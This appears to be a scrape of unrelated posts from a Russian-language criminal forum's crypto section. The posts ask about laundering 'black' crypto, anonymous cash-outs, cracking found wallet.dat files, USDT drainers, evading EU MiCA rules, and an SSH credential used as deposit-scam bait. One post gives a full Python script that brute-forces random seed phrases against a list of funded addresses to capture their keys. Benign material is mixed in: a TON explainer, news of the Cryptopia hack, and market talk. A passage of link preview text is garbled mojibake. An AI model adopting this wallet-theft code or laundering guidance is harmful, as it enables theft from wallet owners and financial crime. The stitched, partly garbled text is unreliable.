После отмывки черной крипты деньги попадают на ваш счет, но есть один вопрос. Люди заинтересуются откуда у тебя взялись эти деньги и какие мазы можно лепить? Был ли у вас такой опыт?

Всем доброго времени суток.
Заинтересовал один сервис, который якобы по публичному ключу генерирует множество адресов для оплаты.
Все что гуглилось указывало на то, что с одного публичного ключа можно сгенерить только один адрес оплаты.
Может я что-то не правильно понимаю, поясните этот момент кто владеет вопросом.

Материалы по теме


[ How to create a Bitcoin wallet address from a private key

](https://www.freecodecamp.org/news/how-to-create-a-bitcoin-wallet-address- from-a-private-key-eca3ddd9c05f/)

In the previous article [https://www.freecodecamp.org/news/how-to-generate- your-very-own-bitcoin-private-key-7ad0f4936e6c/] , we looked at different methods to generate a private key. Whatever method you choose, you’ll end up with 32 bytes of data. Here’s the one that we got at the end of that...

www.freecodecamp.org

[ How to Generate a Bitcoin Address — Step by Step

](https://medium.com/coinmonks/how-to-generate-a-bitcoin-address-step-by- step-9d7fcbf1ad0b)

Here is a bash script that does what is outlined below: https://gist.github.com/JBaczuk/dab51daf6280f6a2d4b58897d6b36e9b

medium.com

[ How to create a Bitcoin address from a Public Key?

](https://www.cryptocompare.com/wallets/guides/how-to-create-a-bitcoin- address-from-a-public-key/)

How to create a Bitcoin address from a Public Key?

www.cryptocompare.com

[ Bitcoin in a nutshell â Cryptography

](https://habr.com/ru/post/319868/)

Ðдна из пÑиÑин, поÑÐµÐ¼Ñ Bitcoin пÑÐ¾Ð´Ð¾Ð»Ð¶Ð°ÐµÑ Ð¿ÑивлекаÑÑ ÑÑолÑко Ð²Ð½Ð¸Ð¼Ð°Ð½Ð¸Ñ â ÑÑо его иÑклÑÑиÑелÑÐ½Ð°Ñ Â«Ð¼Ð°ÑемаÑиÑноÑÑÑ». СаÑоÑи ÐакамоÑо ÑдалоÑÑ ÑоздаÑÑ ÑиÑÑемÑ, коÑоÑÐ°Ñ ÑпоÑобна ÑÑнкÑиониÑоваÑÑ Ð¿Ñи...

 habr.com

Destiner/blocksmith

Bitcoin/Ethereum key manipulation. Contribute to Destiner/blocksmith development by creating an account on GitHub.

github.com

Click to expand...

Интересует код на php/python/go который будет генерить множество валидных адресов для одного публичного ключа. Если такое вообще возможно.
Спасибо.

Ты наверняка уже слышал про TON — проект Павла Дурова и разработчиков Telegram, связанный с блокчейном, криптовалютами и децентрализацией. В этой статье я расскажу о том, что нас ждет, и почему TON — не просто очередной блокчейн.

Очень долго в разговорах не было конкретики: Дуров ничего не объявлял официально, а разные источники расходились во мнениях о том, что же такое TON. Первые достоверные новости появились в феврале 2018 года, когда Павел Дуров зарегистрировал компании TON Issuer и Telegram Group в Комиссии по ценным бумагам и биржам США (SEC). За два раунда закрытого ICO команде удалось привлечь инвестиции в размере 1,7 миллиарда долларов.

И хотя никаких публичных заявлений Дуров не делал, работа над проектом идет вовсю. Документация и код TON доступны всем желающим по адресу test.ton.org, а на GitHub появилась организация ton- blockchain, которая опубликовала исходный код TON Blockchain Software.

Эта статья основана на текущей версии white paper (PDF) и доступном коде по состоянию на момент подготовки (см. дату публикации). TON — проект, который находится в активной разработке; прямо сейчас запущена только тестовая сеть. У меня нет информации о том, какие изменения будут внесены в этот проект.

Что такое TON?
TON расшифровывается как Telegram Open Network. В первую очередь это платформа, одним из ключевых компонентов которой является TON Blockchain. Сам по себе TON блокчейном не является — скорее это децентрализованный суперкомпьютер, в основе которого лежит блокчейн. В TON входят следующие компоненты.

• TON Blockchain — ключевой компонент TON, о котором мы поговорим ниже.
• TON Network — сетевой уровень, который используется для коммуникации. Все остальные компоненты системы так или иначе используют TON Network для общения.
• TON DHT — распределенная хеш-таблица, похожая на Kademlia. Очень важный компонент платформы: используется в TON Storage (для поиска нод, которые имеют тот или иной файл), TON Proxy и других сервисах.
• TON Storage — децентрализованное хранение файлов, независимое от блокчейна. TON Blockchain вместе с TON DHT предоставляют «доступ» к файлам, в то время как сами файлы могут находиться где угодно. Похоже на то, как сейчас работают торренты.
• TON Proxy — прокси. Да, это просто возможность общаться не напрямую, а через посредников, которые готовы предоставить свои узлы для этих целей. Похоже на то, как сейчас работает I2P.
• TON Services — платформа для сервисов. В качестве примера я расскажу о создании «сайта в TON».
• TON DNS — о нем мы тоже поговорим чуть позже.
• TON Payments — платформа для (микро)платежей.

TON Blockchain
Это ключевой компонент TON. Он представляет собой не просто блокчейн, а коллекцию разных блокчейнов.

• Masterchain — самый главный блокчейн, классическая цепочка блоков, содержит параметры системы, состояние воркчейнов и их шардов (про них ниже), хеши всех последних блоков, количество выпущенных Gram и прочую важную информацию. В общем, все самое необходимое для функционирования системы.
• Workchain — объединяет шарды. Всего может быть 232 таких воркчейнов, каждый из которых имеет уникальный идентификатор и свою логику. Каждый воркчейн, например, может иметь свою виртуальную машину, свои форматы адресов. То есть теоретически можно создать воркчейн для процессинга смарт-контрактов из Ethereum. Первый воркчейн будет иметь префикс 0 — он зарезервирован для основного воркчейна TON.
• Shardchain (далее — шард) — главная часть масштабирования. В рамках одного воркчейна может быть 260 шардов. Шарды могут «общаться» друг с другом, каждый шард отвечает за определенные аккаунты и подчиняется всем правилам своего воркчейна.
• Accountchain — можно сказать, что это учетная книга (ledger) для входящих и исходящих сообщений определенного аккаунта.

Все это было придумано для решения двух острых проблем. Первая проблема — размер блокчейна, который непрерывно растет и в случае с Bitcoin в 2019 году [перевалил за 200 Гбайт](https://charts.bitcoin.com/btc/chart/blockchain- size#5ma4). Большинство криптовалют требуют хранить и синхронизировать весь блокчейн, и это становится все более накладно с ростом сети. Вторая проблема заключается в том, что для внесения серьезных инфраструктурных изменений часто требуется «пересоздать» блокчейн, то есть сделать форк.

TON решает первую проблему с помощью Infinite Sharding Program, как она называется в документе. Чтобы объяснить, как это работает, лучше зайти издалека. Начнем с того, что workchain — это на самом деле виртуальный блокчейн, объединяющий несколько шардов. Идентификатор воркчейна является частью идентификатора конкретного шарда, благодаря которому можно понять, к какому воркчейну относится тот или иной шард.

Создать воркчейн может каждый, кто готов оплатить высокую стоимость транзакции в мастерчейне и опубликовать спецификацию и «правила» нового воркчейна. Тем не менее требуется консенсус двух третей текущих валидаторов, так как им придется обновить ПО для работы с блоками нового воркчейна.

Каждый шард имеет следующий идентификатор в виде кортежа: workchain_id и префикс самого шарда. Префикс отвечает за те аккаунты (адреса), которые будут включены в шард. Например, если префикс 1337, то все адреса, которые начинаются с 1337, будут в этом шарде. Префикс может динамически меняться и иметь длину от 0 до 60 бит. Сделано это для того, чтобы склеивать шарды без нагрузки и разделять нагруженные шарды.

Accountchain — еще один виртуальный блокчейн, который имеет идентификатор в виде кортежа: workchain_id и идентификатор самого аккаунта.

Майнинг
Вместо привычного перебора хешей на видеокартах в TON используется одна из вариаций PoS-алгоритма, которая решает проблему византийских генералов (далее — BFT): в результате для консенсуса требуется две трети валидаторов.

Новые блоки создаются и проверяются валидаторами. Любой может стать валидатором, если он готов заложить много GRM в мастерчейн, подтвердив таким образом свои намерения. Такой «залог» замораживается минимум на месяц. На данный момент для того, чтобы стать валидатором в тестовой сети, нужно 100 000 GRM (тестовых, конечно же).

Валидаторы распределяются между всеми существующими шардами в случайном порядке. Примерно каждые 1024 блока валидаторы меняют шард, в котором они «работают». В рамках одного шарда валидаторы выбирают новый блок (благодаря BFT). Если консенсус был достигнут, то формируется новый блок, комиссии с транзакций и эмиссия в этом блоке распределяются между валидаторами. Один и тот же валидатор может валидировать несколько шардов — подразумевается, что он будет проделывать эту работу параллельно.

Если валидатор выбрал «неверный блок», то он может быть оштрафован на всю сумму или часть его залога. Валидатора также могут отстранить от работы на какое-то время. Когда все шарды сформировали новые блоки (или после тайм-аута, предположительно, в пять секунд), генерируется блок для мастерчейна, который содержит хеши всех новых блоков в шардах. В свою очередь, этот блок формируется благодаря консенсусу всех валидаторов в системе.

Исправление ошибок
Я посвящаю исправлению ошибок отдельный параграф, так как это очень интересный вопрос в мире блокчейна (вспомни историю The DAO и Ethereum Classic) и меня очень много о нем спрашивали на последнем выступлении про TON.

Конечно, ошибок быть не должно, так как для консенсуса требуется две трети валидаторов, но в системе заложено обнаружение и исправление «неправильных» блоков. Предположим, что был обнаружен «неправильный» блок, и валидаторов, которые подписали этот блок, наказали. Но система все еще имеет неправильный блок — так что этих мер недостаточно.

В большинстве других систем для этого требуется форк с последнего «правильного» блока. Такой подход имеет множество недостатков: его сложно реализовать, нужно убедить всех участников перейти на новую сеть после форка; и не менее остро стоит вопрос о том, что делать с правильными транзакциями, которые были совершены уже после «неправильного» блока.

TON Blockchain решает эту проблему следующим образом. Каждый блок в шарде (и в мастерчейне тоже) является блокчейном, который по умолчанию состоит из одного блока. Если требуется исправить «неверный» блок, то этот маленький блокчейн вырастает еще на один блок, который и заменяет предыдущий. Этот блок также генерируется валидаторами, которые в данный момент работают в шарде.

При этом отдельно упоминается, что блоки в виртуальном accountchain не будут изменены, если они были правильные. Подразумевается, что в новом блоке будут исправлены только «неверные» транзакции, но это не затронет правильные.

Cмарт-контракты
Смарт-контракты в TON позволяют написать бизнес-логику, которая будет выполняться децентрализованно. Контракты полноценные по Тьюрингу, и их предлагается писать на языке Fift. Fift — новый язык программирования, созданный специально для TON; он имеет определенные сходства с Forth.

Для выполнения смарт-контрактов была написана виртуальная машина — TON VM (Ton Virtual Machine). Но не стоит забывать, что воркчейн вместе с другими определяющими параметрами может иметь собственную виртуальную машину и собственный язык для смарт-контрактов. Именно поэтому я не буду заострять внимание на Fift и TON VM в этой статье.

Подробности о Fift и TON VM можешь почерпнуть в документации проекта.

Смарт-контракты в TON используются повсеместно: в TON Storage, TON DNS и других сервисах. Для валидации блоков и консенсуса тоже используются смарт- контракты. Как ты уже понял, TON — платформа очень самодостаточная и совершенно не зависит от внешних факторов. Стоит еще упомянуть, что каждый аккаунт формально может являться смарт-контрактом.

Замечу на полях, что компания TON Labs готовит компиляторы для других языков программирования, чтобы писать смарт-контракты можно было не только на Fift. Компиляторы для C и Solidity уже можно посмотреть на ton.dev.

TON DNS
TON DNS — один из сервисов TON. Используется для преобразования понятных человеку идентификаторов (доменные имена, адреса) в адреса ADNL и адреса TON Blockchain.

Использовать TON DNS можно, например, для передачи денег по идентификатору вместо адреса кошелька. Это сильно упрощает дело, потому что теперь можно перевести сумму на понятный адрес или имя пользователя. Также идентификатор можно перенаправить на смарт-контракт — например, выставляем счет на оплату в каком-то магазине, а после перевода контракт обработает платеж.

Сам TON DNS реализован в виде нескольких специальных смарт-контрактов. Эти смарт-контракты представляют собой древовидную структуру. Каждый из них отвечает за регистрацию поддоменов для определенной зоны или домена. Корневой контракт, который обслуживает домены первого уровня сети TON, находится в мастерчейне.

Регистрация нового домена (идентификатора) реализуется через отправку сообщения в смарт-контракт, который отвечает за желаемый поддомен. Это стоит определенной суммы (как и все передаваемые сообщения); указываются ключ, владелец, сроки регистрации. Идентификаторы регистрируются в порядке очереди — кто успел, того и тапки.

Опуская совсем низкоуровневые детали, можно резюмировать, что TON DNS имеет более широкое применение, чем DNS в привычном понимании этого слова. Учитывая возможности TON Blockchain, ADNL и смарт-контрактов, за идентификатором может скрываться как обычный кошелек, так и полноценный сервис с бизнес-логикой.

ADNL
ADNL — собственный протокол, основной для TON. Это протокол, который используется на самом низком уровне. Главное его преимущество — не нужно беспокоиться об адресах IPv4/IPv6, портах и т.д.: они все скрыты абстрактным сетевым уровнем. Для обмена данными используются 256-битные сетевые адреса (названные «абстрактными сетевыми адресами»). Если говорить простым языком, это аналог SSL по UDP. Чтобы принимать и расшифровывать сообщения, предназначенные для определенного адреса, необходимо иметь его приватный ключ. Для того, чтобы отправить сообщение, необходимо (помимо адреса) знать публичный ключ получателя.

С точки зрения большинства компонентов TON, существует только ADNL, с помощью которого можно отправлять сообщения с одного адреса на другой. В текущем white paper сказано, что ADNL будет реализован через UDP с опциональным откатом до TCP, если UDP будет недоступен. Еще в документе упоминается RLDP (Reliable Large Datagram Protocol) как похожий на TCP протокол более высокого уровня.

Cайт в сети TON
Теперь, когда мы знаем про ADNL и TON DNS, можно поговорить о том, как может выглядеть создание сайта в TON. Такой сайт будет децентрализованно хоститься в TON Network. Сервисы, которые полностью находятся в TON Network, называются ton-services.

В качестве примера white paper описывает создание сервиса, который принимает запросы HTTP через RLDP. Чтобы реализовать его, нужен обычный браузер и прокси-сервер, который будет переводить запросы HTTP в TON Network. Общаясь по протоколу RLDP, сервис может отвечать на запросы, а прокси-сервер будет возвращать их клиенту в привычном формате.

Стоит упомянуть, что на этом этапе можно использовать TON DNS для «коротких» адресов. Это позволяет воссоздать привычный порядок вещей. В будущем мы можем увидеть какой-нибудь TON Browser, аналогичный браузеру для сети Tor.

Заключение
Как видишь, описать TON в двух словах непросто. Это большая и сложная система, которая состоит из разных низкоуровневых компонентов, и блокчейн TON — только один из них. Но TON при этом — это не только блокчейн.

Уже в этом году мы, возможно, будем наблюдать запуск полноценной сети. Скорее всего, некоторые компоненты платформы из тех, что описаны в этой статье, будут доступны позже других.

Однако уже сейчас можно испытать клиент и сеть на тестовой ноде. Если тебе интересна эта тема и тянет на эксперименты, можешь заглянуть в blockchain explorer или даже собрать клиент и ноду.

Автор Sergey Chernikov
хакер.ру

Популярная новозеландская криптовалютная биржа Cryptopia сообщила, что понесла «значительные убытки» в результате кибератаки, обнаруженной вчера, 14 января 2019 года. В настоящее время сайт биржи не работает, и не заработает, пока продолжается расследование случившегося.

Пока об атаке неизвестно практически ничего. Представители Cryptopia не сообщают никакой конкретики, неизвестен даже точный размер ущерба, причиненного торговой площадке. При этом сообщается, что к расследованию инцидента уже подключилась полиция Новой Зеландии и специальное подразделение по борьбе с преступлениями в сфере высоких технологий. По [данным правоохранителей](http://www.police.govt.nz/news/release/investigation- involving-crypto-currency-company), все началось с того, что представители биржи обнаружили подозрительную активность и неавторизованные транзакции на своей платформе.

Эксперты ИБ-компании Whale Security предполагают, что атака произошла в минувшие выходные, так как им удалось обнаружить ряд весьма странных транзакций в этот период времени. Так, был замечен перевод 48 029 306 токенов Centrality (CENNZ) с Cryptopia на неизвестный адрес (это примерно 1,2 млн долларов по текущему курсу), а также перевод 19 391 токена Ethereum (ETH), что эквивалентно 2,4 млн долларов. Впрочем, в настоящее время нет официальных подтверждений того, что эти транзакции связаны с атакой.

I didn't see something like this before:

ssh 45.9.148.48
organicswan725:adam40

Click to expand...

You need to deposit to confirm your withdrawal address. I think there's a big chance that someone deposit the required amount. Nice trick.

Какой из локальных кошелей для хранения биткоинов посоветуете? какой используете вы?
и какой кошель считается самым безопасным?

Какую сейчас купить валюту чтобы сразу разбогатеть. есть у вас варианты.

Приветствую.
Подскажите какими решениями пользуетесь, что бы выводить бтс на карту и обналичивать в СНГ в терминалах.
Верно ли я понимаю, что используя карту манибукерс/пионер/етс и выводя бтс проблем не будет?

Много было написано и сказано о криптовалютном проекте от Facebook под названием Libra, кошель у них будет кстати Calibra
Так вот, биткоин в ~~опазносте~~ в полной безопасности

Важно! Глава блокчейн-подразделения Facebook Дэвид Маркус заявил, что проект Libra будет делиться с властями информацией о пользователях для предотвращения преступлений, а также для соответствия требованиям регуляторов.

Click to expand...

Это крипта для хомячков и гастарбайтеров, шлющих деньги на родину. Короче, просто замена PayPal.

Так что учимся лить фейсбучную либру, вместо палки, и радуемся за биткоин

You must have at least 15 reaction(s) to view the content.

Всем привет! кто может подсказать возможно и такое что транзакция битка потерялась и не записалась в блокчейне?
вот кошелек 1LXeXBgn6jwSa5fb3nxjMyjfcohukVJpmK . по нему транзакция за 17.08.18 на скрине есть а по факту нет(

Предлагаю открыть такую одну, общую тему с бесплатными раздачами bitcoin'ов, токенов от бирж/ICO и прочих проектов. Раздают, в основном, копейки, но новичкам должно быть полезно. Да и со временем эти токены могут очень вырасти в цене, как было с BNB токенами биржи binance, которые по началу раздавали бесплатно и стоили оцени сущие центы.

Начну я.

1. Биржа Bitsdaq, bitsdaq.com
является официальным партнером биржи Bittrex, раздают токены BXBC
За регистрацию получаем награду 1000 BXBC, также за каждое ежедневное посещение дают по 200 BXBC. Кроме того, за прохождение процедуры KYC (верификации) существует награда в 5000 BXBC. Вериф можно пройти не на себя, понятно

Привет всем, хотелось понять что такое флэш крипта ?
Существует вообще такое в природе, просто по рассказам такое есть и есть даже кошельки в топ 1000 богатейших с такими монетами.
Знаю что есть сайт который якобы продает софт который создает такие биткоины, если не много погуглить понятно что это скам.

с фэйк криптой допустим мне понятно, что это просто иходники того-же же токене тока создаешь свой смарт контракт.
Но давайте и фэйки обсудим может что-то хорошее научились делать

Друзья биток валится, если есть какие мысли не стесняйтесь делитесь. Своими мыслями поделюсь.
Если биткоин продолжить падать первая цель 36340 по фибоначи, уровень 1.618, следующая 31370. Геп на фьчах на уровне 20330, следующий 11200 и 9750. От пика 49435 до нижнего гепа 9750, 80% падение что совпадает с прошлыми хаями и лоями.
Покажу в картинках =)

Падение от хаев в прошлые разы составляло в районе 80%, как раз попадает на нижний Геп. Что вполне вероятно, чтобы хомяки распродали свою крипту в страхе.
Падать может с отскоками, брить шортистов и лонгистов это святое, на них и будут отскоки. Всем мира!

Доброго дня всем, есть ли тут умельцы которые умеют\пробовали\знают, как вскрывать wallet.dat
Есть кош, знаю что бывают фейк коши и т.д, в плане wallet.dat навыков и знаний 0, хочется узнать, кошелек вроде живой, транзакции свежих годов и даже этого месяца.
Есть ли какие варианты что-нибудь с ним наделать.

а кто-то занимался брутом сида для blockchain.info? мне в голову стрельнула такая мысль. поделитесь стоит ли того чтобы этим заниматся? или шанс слишком ничтожен?
12 слов не так уж и много. по статистике на 2к23 год там было 2кк+ кошелей с разными баликами.

Здравствуйте! Могу рассказать пару схем как можно отмывать крипту без использования местных обменников и платы процентов.

Если интересно - let me know (дайте знать) и я все развалю по пунктам)

Биток снова на характере… новостей не вижу, это он на англосакские войны с мигрантами так развыебывался? Вроде после ключ.ставки и отчета о занятости на 62 устаканился… кто в курсе?

Подскажите сколько будет стоить написание простого софта по поиску забытых кошельков?

Автор одной статьи рекомендовал для безопасности генерировать новую фразу при надобности оплатить услугу или приобрести товар в интернете. За длительный период времени пользования криптовалютой, в частности биткоин, у меня скопилось неимоверное количество кошельков на балансе каждого из которых, одна или две пары долларов. Существует ли такой сервис, на котором можно анонимно утилизировать всю эту мелочь и вывести на новый кошелёк? Впервые сталкиваюсь с данной мне проблемой, прошу не судить строго если вопрос чересчур банален.

Всем добра.

Есть ли реализации дрейнера для списания средств с Usdt на биржах, трасте?

Я только что создал меметическую монету с изображением нашего форума на TON, я отправлю большое количество монет самым старым и заметным пользователям форума, если этот проект заинтересует сообщество достаточно и вы захотите заполнить центр ликвидности, я откажусь от прав и монета будет принадлежать всему сообществу форума. Если вам нравится эта инициатива, увеличьте количество лайков, реакций и комментариев. и те, кто хочет, пожалуйста, сообщите .

[ XSS.is · Tonviewer

](https://tonviewer.com/UQCUzemb6kEaFsQaOENlRP1WJZcgEEQjlNvbfM1Yu1yegrSJ/jetton/EQABOyqnGZfAJzl3zFPOrPclE2BMCKCt8N9dq3Nn2FIKAwU-)

Explore events, transactions, nft, tokens and more for EQABOyqnGZfAJzl3zFPOrPclE2BMCKCt8N9dq3Nn2FIKAwU-

tonviewer.com

I have just created a memecoin bearing the image of our forum on TON, I will send a large number of coins to the oldest and most notable users of the forum, if this project interests the community enough and you want to fill the liquidity center I would revoke the rights and the coin will belong to the entire forum community. If you find this initiative cool, increase the likes, reactions and comments. and those who want it please report

Совет Европы принял новые правила регулирования цифровых активов Markets in Crypto-Assets (MiCA). Это [следует](https://www.consilium.europa.eu/en/press/press- releases/2023/05/16/digital-finance-council-adopts-new-rules-on-markets-in- crypto-assets-mica/) из сообщения совета.
Уточняется, что новые правила направлены на повышение прозрачности криптосферы и включают меры по борьбе с отмыванием денег. Документ вводит единую нормативно-правовую базу для криптокомпаний из стран Евросоюза.
Новые правила распространяются на эмитентов стейблкойнов, а также на поставщиков услуг, таких как торговые площадки и провайдеры криптовалютных кошельков, где хранятся криптоактивы. Помимо этого криптоплатформы должны информировать своих пользователей о рисках, связанных с криптовалютами. Ранее уточнялось, что законопроект предполагает, что компании должны получить разрешение на работу в Европе. Его в течение трех месяцев обязаны выдавать национальные власти, которые также передают информацию о разрешениях в Европейское управление по ценным бумагам и рынкам (ESMA).

Впервые проект MiCA был представлен в сентябре 2020 г. В апреле 2023 г. законопроект одобрил Европарламент. В совете отметили, что официальное принятие регламента 16 мая является заключительным шагом.
По информации Bloomberg, новые правила будут [вводить ](https://www.bloomberg.com/news/articles/2023-04-20/eu-s-mica-crypto- regulations-clear-final-parliament-vote?sref=l3J6d079)постепенно, но ограничения в отношении стейблкойнов заработают с июля 2024 г.
В 2022 г. Европарламент одобрил новые положения в законопроект об отмывании денег, которые также касаются и контроля операций с криптовалютой. Транзакции с использованием критовалюты будут обязательными к идентификации.
ИСТОЧНИК <https://www.vedomosti.ru/finance/news/2023/05/16/975352-v-es- prinyali-pravila-kriptoaktivov>
------------------------------------------------------------------------
Приветствую XSS сообщество.
Я и ещё пару сотен испуганых европейцев начанаем искать выход (обход) этого ********** Европейского закона
вот решил спросить у знатоков как нам спасти бизнесы и ананимность ?
надеюсь нас спасут ответом Хакеры и другие герои форума которые возможно были готовы к такому.
Спасибо за внимане

зная что у человека более 10бтц на бирже и на холодном коше

Помимо Wasabi Wallet / Chipmixer / Samouri Wallet / Blender.io Какие биткоин- миксеры вы рекомендуете?

Привет друзья, возник вопрос, так как я очень переживаю за анонимность.
Как вы покупаете свои BTC? какие виртуальные кошельки вы используете?
Некоторые платформы, которые могут посоветовать, были бы очень полезны

-Cкрипт предназначен для проверки сид фраз и соответствующих им биткоин-адресов в базе данных.
- Он генерирует случайные сид фразы, создает ключи и адреса на их основе, а затем проверяет, есть ли совпадения с адресами из базы данных.
- Если найдено совпадение, скрипт записывает сид фразу и соответствующий адрес в файл.

- Для работы скрипта необходимо установить следующие модули и зависимости:
- os
- random
- mnemonic
- bip32utils

- Скрипт использует базу данных адресов для сравнения сгенерированных адресов.
- База адресов должна находится в файле base.txt.
- Каждый адрес должен быть записан в отдельной строке файла.

- Для генерации сид фраз скрипт использует ворд лист.
- Список слов должен быть сохранен в файле word_list.txt.
- Каждое слово должно быть записано в отдельной строке файла.
-Используем ворд лист, для того что бы человек мог записать в этот файл не все 2048 слов, а нужные ему 12 или другое количество.

- Скрипт использует два различных метода деривации ключей для генерации адресов: BIP32 и BIP44.
- BIP32 (иерархическая детерминированная ключевая серия) использует структуру дерева ключей для создания производных ключей.
- BIP44 (Bitcoin Improvement Proposal 44) является стандартом, который определяет дерево ключей и пути для создания адресов для определенного кошелька.
- Для генерации ключей и адресов скрипт использует энтропию, которая является случайной последовательностью слов из ворд листа.
- Для каждого пути (BIP32 и BIP44) скрипт генерирует производный ключ и соответствующий адрес на основе энтропии.
-Вы можете внести свои изменения относительно ваших нужд

- Когда скрипт находит совпадение между сгенерированным адресом и адресом из базы данных, он записывает сид фразу и адрес в файл seedyes.txt.
- Каждое совпадение записывается на отдельных строках файла, сид фраза и адрес разделены строкой.
- Если файл seedyes.txt не существует, скрипт создаст его и добавит записи в конец файла.

Сам код:

Python:Copy to clipboard

import os
import random
from mnemonic import Mnemonic
from bip32utils import BIP32Key

# берем слова из word list
def load_word_list():
    word_list_path = os.path.join(os.path.dirname(os.path.abspath(__file__)), 'word_list.txt')
    with open(word_list_path, 'r') as file:
        word_list = file.read().splitlines()
    return word_list

# генерируем случайный сид
def generate_seed_phrase(word_list):
    mnemonic = Mnemonic("english")
    return mnemonic.generate(128)

# генерируем адресацию в BIP32, плюс деревацию и количество аков
def generate_bip32_address(seed_phrase, path):
    mnemonic = Mnemonic("english")
    seed = mnemonic.to_seed(seed_phrase)
    root_key = BIP32Key.fromEntropy(seed)
    path_parts = path.replace("Bip32 m/", "").split("/")
    for part in path_parts:
        if part.isdigit():
            derived_key = root_key.ChildKey(int(part))
            root_key = derived_key
    return derived_key.Address()

# генерируем адресацию в BIP44, плюс деревацию и количество аков
def generate_bip44_address(seed_phrase, path):
    mnemonic = Mnemonic("english")
    seed = mnemonic.to_seed(seed_phrase)
    root_key = BIP32Key.fromEntropy(seed)
    path_parts = path.replace("BIP44 m/44'/0'/0'", "").split("/")
    for part in path_parts:
        if part.isdigit():
            derived_key = root_key.ChildKey(int(part))
            root_key = derived_key
    return derived_key.Address()

# читаем базу
def read_address_database():
    addresses_path = os.path.join(os.path.dirname(os.path.abspath(__file__)), 'base.txt')
    with open(addresses_path, 'r') as file:
        addresses = file.read().splitlines()
    return addresses

# сохраняем совпадения в файл
def write_matched_seeds(seed_phrase, address):
    with open('seed_yes.txt', 'a') as file:
        file.write(f"Seed Phrase: {seed_phrase}\nAddress: {address}\n\n")

# проверка адресов
def check_seeds():
    word_list = load_word_list()
    addresses = read_address_database()
    seed_count = 0
    match_count = 0

    while True:
        seed_phrase = generate_seed_phrase(word_list)
        for i in range(5):
            for j in range(3):
                path_bip32 = f"Bip32 m/{i}/{j}"
                address_bip32 = generate_bip32_address(seed_phrase, path_bip32)
                if address_bip32 in addresses:
                    write_matched_seeds(seed_phrase, address_bip32)
                    match_count += 1
                seed_count += 1

                path_bip44 = f"BIP44 m/44'/0'/0'/{i}/{j}"
                address_bip44 = generate_bip44_address(seed_phrase, path_bip44)
                if address_bip44 in addresses:
                    write_matched_seeds(seed_phrase, address_bip44)
                    match_count += 1
                seed_count += 1

        print(f"All: {seed_count} . Found: {match_count}", end="\r")
        
# можете увеличить количество проверяемых аков и глубину адресов {j} и {i}

check_seeds()

вылезло
абать
можно сказать с голой жопой остался
что можно юзать под битки чтоб такие приколы не выскакивали и на паперть не пойти?

Часть 1, учимся на прошлом: циклы, победы и поражения​

Медвежьи рынки в перспективе​

В октябре 2008-го это сообщение разошлось по эмейл-рассылке шифропанков:
Я работаю над новой системой электронных денег без участия третьих лиц. Вайт- пейпер доступен здесь: .....pdf
Через несколько месяцев, 3 января 2009 года , человек или люди под псевдонимом Сатоши Накамото основали сеть Биткоин. Тринадцать лет спустя биткойн стал источником вдохновения для совершенно новой индустрии и нового класса активов стоимостью около 1 триллиона долларов. Хоть биткоин и называют "самым доходным активом десятилетия ", ведь с момента создания он вырос более чем на 40 000 000%, его путь, как и у всей сферы, не всегда был гладким.
Я говорил о взаимосвязи кризисов и зарождении важнейших проектов в прошлой статье - когда происходит коллапс, отсеиваются слабые команды и их проекты, остаются сильные, верящие в сферу и самые прибыльные в перспективе — ethereum , solana , polygon , uniswap , opensea , daomaker , e.t.c.
Это локально для криптосферы. Но что говорить, когда даже она зародилась с появления сети биткоина. То есть, после кризиса 2008.
Циклы рынка несут куда больше информации, чем нам кажется, этому и посвящена первая глава.
Из идеи децентрализованной сети, изложенной на девяти страницах white- paper, превратилась в отрасль стоимостью триллион долларов, внедряющую инновации в таких областях, как: устойчивая энергетика , финансы , развлечения , искусство и многое другое.

Увертюра. Как определить в каком мы цикле?​

Увертюра (фр. ouverture от лат. apertura «открытие; начало») - это своеобразное предисловие к произведению. Она играет весьма важную роль, так как заранее подготавливает зрителей к действию или событиям, которое далее будут изложены.
Мы переживаем значительное снижение цен, неопределенность продолжает омрачать криптовалютные рынки. Однако, понимание того, где именно мы находимся в этом рыночном цикле, дает перспективу и понимание ситуации.
Подобно традиционным финансовым рынкам, в крипте также присутствуют сменяющие друг друга циклы. В среднем цикл длится 4 года , сопоставимо периодичности халвинга $BTC.
Смена цикла знаменует глобальный переход рынка от медвежьего к бычьему.
Существует множество методов определения смены циклов, количественно мы можем определить это когда реализованная цена $BTC становится ниже рыночной.
Реализованная цена — цена, по которой был куплен /продан актив. Она дает понять сколько позиций в рынке находится в прибыли либо в убытке.
Чтобы понять лучше - посмотрим на график:

Циклы рынка: рыночная цена и реализованная цена
Реализованная цена ниже рыночной подразумевает, что большинство активов удерживается выше цены, по которой они были куплены = большинство в плюсе, и наоборот. РЦ выше рыночной = большинство в минусе.
Определив когда большинство $BTC удерживаются выше цены , по которой они были куплены , мы можем определить , когда рынок начинает переходить от медвежьего рынка к бычьему рынку , а значит новому циклу.
И это прекрасно видно по графику выше. Новый цикл приходит, когда медвежий рынок сменяется бычьим.
Цена $BTC выступает в роли индикатора рынка, так как по сей день отражает рыночные настроения и интерес к сфере, занимая 40 % ее капитализации.

Мы уже в медвежьем рынке?​

13 июня мы официально вступили в медвежий рынок и находимся в конечной стадии 4-го криптоцикла.
Мы находимся пять месяцев в этой зоне, и мы можем увидеть еще ~120 дней* благоприятных возможностей для покупки по сравнению с предыдущими циклами.

*Эта цифра базируется на [исследовании](https://grayscale.com/learn/bear- markets-in-perspective/) Grayscale от Июля 2022 -го года и выведена математически на основе данных предыдущих циклов.

Крах FTX - масштабное событие, которое оказало влияние на этот прогноз, другие компании выпускали похожие исследования, уже после и их я разберу дальше в этой статье. Эту цифру предположительно можно сдвинуть на несколько месяцев, однако, прошлые медвежьи рынки также сплошь и рядом состояли из падений, например, взлом биржи Mt. Gox на 800.000 $BTC , хардфорк Ethereum и так далее. И математика уже это вмещает, поэтому вполне разумно взять прогноз Grayscale как точку отсчета.

Click to expand...

Другими словами — медвежий рынок продлится предположительно еще 120 дней.
показана средняя цена биткойна в зонах, где реализованная цена > рыночной цены биткойна. данные от 6 июля 2022
Вполне логично, что подобные периоды считаются одними из лучших точек для входа в рынок. Статистически это верно, по таблице прибыль колоссальная. Главное суметь определиться с правильным активом
С каждым новым циклом рынок становится более зрелым. Криптовалюты не только стали более доступными для розничных инвесторов, но и для институциональных инвесторов, которые ранее не могли инвестировать в этот класс активов, пока не появились ETF в Европе , Канаде и Бразилии. Вполне возможно, мы увидим и США в этом списке, а это приходит из сотрудничества BlackRock и Coinbase.
Кроме того, децентрализованные приложения (dApps) набирают обороты и находят свое применение на рынке децентрализованных финансов , игр , искусства и многого другого.
